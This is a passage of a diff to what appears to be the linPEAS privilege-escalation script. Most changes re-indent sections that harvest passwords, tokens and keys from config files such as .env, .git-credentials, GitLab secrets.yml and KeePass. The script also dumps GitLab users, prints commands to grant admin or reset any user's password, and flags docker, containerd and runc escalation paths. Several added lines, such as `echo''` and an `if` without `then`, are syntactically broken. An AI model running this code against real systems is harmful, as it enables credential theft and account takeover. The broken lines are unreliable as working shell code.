\"filezilla\.xml$\"`" ]; then echo_not_found "filezilla.xml"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla\.xml$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"recentservers\.xml$\"`" ]; then echo_not_found "recentservers.xml"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; - print_2title "Analyzing Backup Manager Files (limit 70)" + print_2title "Analyzing Backup Manager Files (limit 70)" if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"storage\.php$\"`" ]; then echo_not_found "storage.php"; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "storage\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,storage\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"database\.php$\"`" ]; then echo_not_found "database.php"; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "database\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,database\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; - ##-- SI) passwd files (splunk) - print_2title "Searching uncommon passwd files (splunk)" - SPLUNK_BIN="$(command -v splunk 2>/dev/null)" - if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi - printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do - if [ -f "$f" ] && ! [ -x "$f" ]; then - echo "passwd file: $f" | sed "s,$f,${SED_RED}," - cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED}," - fi - done - echo "" - - print_2title "Analyzing kcpassword files" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword" - printf "%s\n" "$PSTORAGE_KCPASSWORD\n" | while read f; do - echo "$f" | sed -${E} "s,.*,${SED_RED}," - base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - done - echo "" - - ##-- SI) Gitlab - print_2title "Searching GitLab related files" - #Check gitlab-rails - if [ "$(command -v gitlab-rails)" ]; then - echo "gitlab-rails was found. Trying to dump users..." - gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED}," - echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'" - echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'" - echo "" +##-- SI) passwd files (splunk) +print_2title "Searching uncommon passwd files (splunk)" +SPLUNK_BIN="$(command -v splunk 2>/dev/null)" +if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi +printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do + if [ -f "$f" ] && ! [ -x "$f" ]; then + echo "passwd file: $f" | sed "s,$f,${SED_RED}," + cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED}," fi - if [ "$(command -v gitlab-backup)" ]; then - echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'" - echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'" - echo "" - fi - #Check gitlab files - printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do - if echo $f | grep -q secrets.yml; then - echo "Found $f" | sed "s,$f,${SED_RED}," - cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" - elif echo $f | grep -q gitlab.yml; then - echo "Found $f" | sed "s,$f,${SED_RED}," - cat "$f" | grep -A 4 "repositories:" - elif echo $f | grep -q gitlab.rb; then - echo "Found $f" | sed "s,$f,${SED_RED}," - cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED}," - fi - echo "" - done - echo "" +done +echo "" - print_2title "Analyzing Github Files (limit 70)" +print_2title "Analyzing kcpassword files" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword" +printf "%s\n" "$PSTORAGE_KCPASSWORD\n" | while read f; do + echo "$f" | sed -${E} "s,.*,${SED_RED}," + base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +done +echo "" + +##-- SI) Gitlab +print_2title "Searching GitLab related files" +#Check gitlab-rails +if [ "$(command -v gitlab-rails)" ]; then + echo "gitlab-rails was found. Trying to dump users..." + gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED}," + echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'" + echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'" + echo "" +fi +if [ "$(command -v gitlab-backup)" ]; then + echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'" + echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'" + echo "" +fi +#Check gitlab files +printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do + if echo $f | grep -q secrets.yml; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" + elif echo $f | grep -q gitlab.yml; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" | grep -A 4 "repositories:" + elif echo $f | grep -q gitlab.rb; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED}," + fi + echo "" +done +echo "" + + print_2title "Analyzing Github Files (limit 70)" if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.github$\"`" ]; then echo_not_found ".github"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.github$" | while read f; do ls -ld "$f" | sed -${E} "s,\.github$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.gitconfig$\"`" ]; then echo_not_found ".gitconfig"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.gitconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gitconfig$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git-credentials$\"`" ]; then echo_not_found ".git-credentials"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git-credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git-credentials$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git$\"`" ]; then echo_not_found ".git"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git$,${SED_RED},"; done; echo ""; - print_2title "Analyzing Svn Files (limit 70)" + print_2title "Analyzing Svn Files (limit 70)" if ! [ "`echo \"$PSTORAGE_SVN\" | grep -E \"\.svn$\"`" ]; then echo_not_found ".svn"; fi; printf "%s" "$PSTORAGE_SVN" | grep -E "\.svn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.svn$,${SED_RED},"; ls -lRA "$f";done; echo ""; - print_2title "Analyzing PGP-GPG Files (limit 70)" + print_2title "Analyzing PGP-GPG Files (limit 70)" ( (command -v gpg && gpg --list-keys) || echo_not_found "gpg") 2>/dev/null ( (command -v netpgpkeys && netpgpkeys --list-keys) || echo_not_found "netpgpkeys") 2>/dev/null (command -v netpgp || echo_not_found "netpgp") 2>/dev/null @@ -2938,127 +2900,127 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gnupg$\"`" ]; then echo_not_found "*.gnupg"; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gnupg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gnupg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - print_2title "Analyzing Cache Vi Files (limit 70)" + print_2title "Analyzing Cache Vi Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.swp$\"`" ]; then echo_not_found "*.swp"; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.swp$" | while read f; do ls -ld "$f" | sed -${E} "s,\.swp$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.viminfo$\"`" ]; then echo_not_found "*.viminfo"; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.viminfo$" | while read f; do ls -ld "$f" | sed -${E} "s,\.viminfo$,${SED_RED},"; done; echo ""; - print_2title "Analyzing Wget Files (limit 70)" + print_2title "Analyzing Wget Files (limit 70)" if ! [ "`echo \"$PSTORAGE_WGET\" | grep -E \"\.wgetrc$\"`" ]; then echo_not_found ".wgetrc"; fi; printf "%s" "$PSTORAGE_WGET" | grep -E "\.wgetrc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.wgetrc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; - ##-- SI) containerd installed - print_2title "Checking if containerd(ctr) is available" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation" - containerd=$(command -v ctr) - if [ "$containerd" ]; then - echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," - ctr image list +##-- SI) containerd installed +print_2title "Checking if containerd(ctr) is available" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation" +containerd=$(command -v ctr) +if [ "$containerd" ]; then + echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," + ctr image list +fi +echo "" + +##-- SI) runc installed +print_2title "Checking if runc is available" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation" +runc=$(command -v runc) +if [ "$runc" ]; then + echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," +fi +echo "" + +#-- SI) Docker +print_2title "Searching docker files (limit 70)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket" +printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do + ls -l "$f" 2>/dev/null + if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then + echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," fi - echo "" +done +echo "" - ##-- SI) runc installed - print_2title "Checking if runc is available" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation" - runc=$(command -v runc) - if [ "$runc" ]; then - echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," - fi - echo "" - - #-- SI) Docker - print_2title "Searching docker files (limit 70)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket" - printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do - ls -l "$f" 2>/dev/null - if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then - echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - fi - done - echo "" - - print_2title "Analyzing Firefox Files (limit 70)" + print_2title "Analyzing Firefox Files (limit 70)" if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"\.mozilla$\"`" ]; then echo_not_found ".mozilla"; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "\.mozilla$" | while read f; do ls -ld "$f" | sed -${E} "s,\.mozilla$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"Firefox$\"`" ]; then echo_not_found "Firefox"; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "Firefox$" | while read f; do ls -ld "$f" | sed -${E} "s,Firefox$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - print_2title "Analyzing Chrome Files (limit 70)" + print_2title "Analyzing Chrome Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"google-chrome$\"`" ]; then echo_not_found "google-chrome"; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "google-chrome$" | while read f; do ls -ld "$f" | sed -${E} "s,google-chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"Chrome$\"`" ]; then echo_not_found "Chrome"; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "Chrome$" | while read f; do ls -ld "$f" | sed -${E} "s,Chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - print_2title "Analyzing Autologin Files (limit 70)" + print_2title "Analyzing Autologin Files (limit 70)" if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin$\"`" ]; then echo_not_found "autologin"; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin\.conf$\"`" ]; then echo_not_found "autologin.conf"; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; - #-- SI) S/Key athentication - print_2title "S/Key authentication" - if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q skey; then - printf "System supports$RED S/Key$NC authentication\n" - if ! [ -d /etc/skey/ ]; then - echo "${GREEN}S/Key authentication enabled, but has not been initialized" - elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then - echo "${RED}/etc/skey/ is writable by you" - ls -ld /etc/skey/ - else - ls -ld /etc/skey/ 2>/dev/null - fi +#-- SI) S/Key athentication +print_2title "S/Key authentication" +if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q skey; then + printf "System supports$RED S/Key$NC authentication\n" + if ! [ -d /etc/skey/ ]; then + echo "${GREEN}S/Key authentication enabled, but has not been initialized" + elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then + echo "${RED}/etc/skey/ is writable by you" + ls -ld /etc/skey/ + else + ls -ld /etc/skey/ 2>/dev/null fi - echo "" +fi +echo "" - #-- SI) YubiKey athentication - print_2title "YubiKey authentication" - if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q yubikey; then - printf "System supports$RED YubiKey$NC authentication\n" - if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then - echo "${RED}/var/db/yubikey/ is writable by you" - ls -ld /var/db/yubikey/ - else - ls -ld /var/db/yubikey/ 2>/dev/null - fi +#-- SI) YubiKey athentication +print_2title "YubiKey authentication" +if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q yubikey; then + printf "System supports$RED YubiKey$NC authentication\n" + if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then + echo "${RED}/var/db/yubikey/ is writable by you" + ls -ld /var/db/yubikey/ + else + ls -ld /var/db/yubikey/ 2>/dev/null fi - echo "" +fi +echo "" - #-- SI) Passwords inside pam.d - print_2title "Passwords inside pam.d" - grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," - echo "" +#-- SI) Passwords inside pam.d +print_2title "Passwords inside pam.d" +grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," +echo "" - print_2title "Analyzing SNMP Files (limit 70)" + print_2title "Analyzing SNMP Files (limit 70)" if ! [ "`echo \"$PSTORAGE_SNMP\" | grep -E \"snmpd\.conf$\"`" ]; then echo_not_found "snmpd.conf"; fi; printf "%s" "$PSTORAGE_SNMP" | grep -E "snmpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,snmpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rocommunity|rwcommunity|extend.*" | sed -${E} "s,rocommunity|rwcommunity|extend.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Pypirc Files (limit 70)" + print_2title "Analyzing Pypirc Files (limit 70)" if ! [ "`echo \"$PSTORAGE_PYPIRC\" | grep -E \"\.pypirc$\"`" ]; then echo_not_found ".pypirc"; fi; printf "%s" "$PSTORAGE_PYPIRC" | grep -E "\.pypirc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.pypirc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username|password,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Postfix Files (limit 70)" + print_2title "Analyzing Postfix Files (limit 70)" if ! [ "`echo \"$PSTORAGE_POSTFIX\" | grep -E \"postfix$\"`" ]; then echo_not_found "postfix"; fi; printf "%s" "$PSTORAGE_POSTFIX" | grep -E "postfix$" | while read f; do ls -ld "$f" | sed -${E} "s,postfix$,${SED_RED},"; for ff in $(find "$f" -name "master.cf"); do ls -ld "$ff" | sed -${E} "s,master.cf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "user=" | sed -${E} "s,user=|argv=,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analyzing Ldaprc Files (limit 70)" + print_2title "Analyzing Ldaprc Files (limit 70)" if ! [ "`echo \"$PSTORAGE_LDAPRC\" | grep -E \"\.ldaprc$\"`" ]; then echo_not_found ".ldaprc"; fi; printf "%s" "$PSTORAGE_LDAPRC" | grep -E "\.ldaprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ldaprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Env Files (limit 70)" + print_2title "Analyzing Env Files (limit 70)" if ! [ "`echo \"$PSTORAGE_ENV\" | grep -E \"\.env$\"`" ]; then echo_not_found ".env"; fi; printf "%s" "$PSTORAGE_ENV" | grep -E "\.env$" | while read f; do ls -ld "$f" | sed -${E} "s,\.env$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[tT][oO][kK][eE][N]|[dD][bB],${SED_RED},g"; done; echo ""; - print_2title "Analyzing Msmtprc Files (limit 70)" + print_2title "Analyzing Msmtprc Files (limit 70)" if ! [ "`echo \"$PSTORAGE_MSMTPRC\" | grep -E \"\.msmtprc$\"`" ]; then echo_not_found ".msmtprc"; fi; printf "%s" "$PSTORAGE_MSMTPRC" | grep -E "\.msmtprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.msmtprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Keepass Files (limit 70)" + print_2title "Analyzing Keepass Files (limit 70)" if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"\.kdbx$\"`" ]; then echo_not_found "*.kdbx"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "\.kdbx$" | while read f; do ls -ld "$f" | sed -${E} "s,\.kdbx$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.config.*$\"`" ]; then echo_not_found "KeePass.config*"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.config.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.config.*$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.ini$\"`" ]; then echo_not_found "KeePass.ini"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.enforced.*$\"`" ]; then echo_not_found "KeePass.enforced*"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.enforced.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.enforced.*$,${SED_RED},"; done; echo ""; - print_2title "Analyzing FTP Files (limit 70)" + print_2title "Analyzing FTP Files (limit 70)" if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"\.ftpconfig$\"`" ]; then echo_not_found "*.ftpconfig"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "\.ftpconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ftpconfig$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ffftp\.ini$\"`" ]; then echo_not_found "ffftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ffftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ffftp\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.ini$\"`" ]; then echo_not_found "ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ftp\.ini$,${SED_RED},"; done; echo ""; @@ -3069,7 +3031,7 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ws_ftp\.ini$\"`" ]; then echo_not_found "ws_ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; - print_2title "Analyzing Racoon Files (limit 70)" + print_2title "Analyzing Racoon Files (limit 70)" if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"racoon\.conf$\"`" ]; then echo_not_found "racoon.conf"; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "racoon\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,racoon\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,pre_shared_key.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"psk\.txt$\"`" ]; then echo_not_found "psk.txt"; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "psk\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,psk\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; @@ -3125,14 +3087,18 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_PASSBOLT\" | grep -E \"passbolt\.php$\"`" ]; then echo_not_found "passbolt.php"; fi; printf "%s" "$PSTORAGE_PASSBOLT" | grep -E "passbolt\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,passbolt\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "host|port|username|password|database" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; + print_2title "Analyzing Jetty Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_JETTY\" | grep -E \"jetty-realm\.properties$\"`" ]; then echo_not_found "jetty-realm.properties"; fi; printf "%s" "$PSTORAGE_JETTY" | grep -E "jetty-realm\.properties$" | while read f; do ls -ld "$f" | sed -${E} "s,jetty-realm\.properties$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Interesting logs Files (limit 70)" + + + print_2title "Analyzing Interesting logs Files (limit 70)" if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"access\.log$\"`" ]; then echo_not_found "access.log"; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "access\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,access\.log$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"error\.log$\"`" ]; then echo_not_found "error.log"; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "error\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,error\.log$,${SED_RED},"; done; echo ""; - print_2title "Analyzing Windows Files Files (limit 70)" + print_2title "Analyzing Windows Files Files (limit 70)" if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.inf$\"`" ]; then echo_not_found "unattend.inf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.inf$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.inf$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"\.rdg$\"`" ]; then echo_not_found "*.rdg"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "\.rdg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.rdg$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"AppEvent\.Evt$\"`" ]; then echo_not_found "AppEvent.Evt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "AppEvent\.Evt$" | while read f; do ls -ld "$f" | sed -${E} "s,AppEvent\.Evt$,${SED_RED},"; done; echo ""; @@ -3184,7 +3150,7 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"wsl\.exe$\"`" ]; then echo_not_found "wsl.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "wsl\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,wsl\.exe$,${SED_RED},"; done; echo ""; - print_2title "Analyzing Other Interesting Files Files (limit 70)" + print_2title "Analyzing Other Interesting Files Files (limit 70)" if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.bashrc$\"`" ]; then echo_not_found ".bashrc"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.bashrc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bashrc$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.google_authenticator$\"`" ]; then echo_not_found ".google_authenticator"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.google_authenticator$" | while read f; do ls -ld "$f" | sed -${E} "s,\.google_authenticator$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"hosts\.equiv$\"`" ]; then echo_not_found "hosts.equiv"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "hosts\.equiv$" | while read f; do ls -ld "$f" | sed -${E} "s,hosts\.equiv$,${SED_RED},"; done; echo ""; @@ -3196,651 +3162,653 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.sudo_as_admin_successful$\"`" ]; then echo_not_found ".sudo_as_admin_successful"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.sudo_as_admin_successful$" | while read f; do ls -ld "$f" | sed -${E} "s,\.sudo_as_admin_successful$,${SED_RED},"; done; echo ""; - echo "" - - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +if echo $CHECKS | grep -q interesting_files; +print_title "Interesting Files" +########################################### +#----------) Interesting files (----------# +########################################### -if echo $CHECKS | grep -q IntFiles; then - ########################################### - #----------) Interesting files (----------# - ########################################### - print_title "Interesting Files" +##-- IF) SUID +print_2title "SUID - Check easy privesc, exploits and write perms" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +if ! [ "$STRINGS" ]; then + echo_not_found "strings" +fi +if ! [ "$STRACE" ]; then + echo_not_found "strace" 